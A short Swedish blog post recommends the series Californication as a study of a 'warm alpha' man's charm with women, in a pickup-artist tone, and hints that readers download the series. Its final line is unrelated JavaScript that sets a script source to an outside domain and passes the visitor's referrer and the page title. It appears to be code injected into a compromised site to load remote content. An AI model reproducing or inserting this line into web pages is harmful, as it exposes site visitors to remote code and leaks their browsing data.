De senaste åren har det gjorts väldigt mycket bra TV som på ett realistiskt sätt skildrar interaktionen mellan män och kvinnor.

En sån serie skulle jag säga är Californication, en serie som väldigt snabbt blev en av mina favoriter.

I serien skildras författaren Hank Moody, en klassisk warm alpha-typ som råkat klanta till hela sitt liv och alienerat kvinnan han älskar – modern till hans barn.

Så där är storyn – hans strävan efter att vinna tillbaka sin kvinnas kärlek och de äventyr som inträffar honom på vägen.

Studera noggrannt David Duchovnys beteende kring kvinnor och fundera varför det kommer sig att de gillar honom så mycket. Ju mer ni lär er om detta, desto mer kommer ni förstå om hans oemotståndliga charm.

Med brasklapp: inte på något sätt ska detta ses som en riktlinje för hur man ska leva sitt liv, men det är en intressant studie i män som har ‘det’ – och här är en sån. Titta noga och studera! Kolla in oreaktivt beteende, avslappnat och öppet kroppspråk, avsaknad av sociala rädslor, avsaknad av sexuella issues etc etc… Framför allt – njut av denna underbara serie!

Här är en liten preview, som tyvärr verkar visa helt fel delar i min mening, men det är alltid nåt! Den är tyvärr också barnsäkrad, så alla godbitarna är borta, men de får ni njuta av när ni laddat hem serien!

Enjoy!

//Nomaggiz

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;